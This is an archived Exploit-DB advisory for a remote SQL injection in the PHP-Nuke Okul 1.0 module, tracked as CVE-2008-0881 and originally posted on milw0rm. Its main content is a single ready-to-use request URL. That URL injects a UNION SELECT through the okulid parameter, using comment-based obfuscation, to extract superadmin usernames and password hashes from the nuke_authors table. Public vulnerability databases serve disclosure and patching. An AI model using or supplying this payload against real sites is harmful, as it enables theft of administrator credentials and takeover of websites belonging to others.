PHP-Nuke Modules Okul 1.0 okulid Remote SQL Injection Vulnerability

2008-02-20T00:00:00
ID EDB-ID:5159
Type exploitdb
Reporter Mehmet Ince
Modified 2008-02-20T00:00:00

Description

PHP-Nuke Modules Okul 1.0 (okulid) Remote SQL Injection Vulnerability. CVE-2008-0881. Webapps exploit for php platform

                                        
                                            =-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

PHP-NUKE Modules Okul v1.0 Remote SQL Injection

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Found: xoron

contact: xorontr@gmail.com (only e-mail)

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Exploit:
modules.php?name=Okul&op=okullar&okulid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Thanx: str0ke, s@bun.

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-= 

# milw0rm.com [2008-02-20]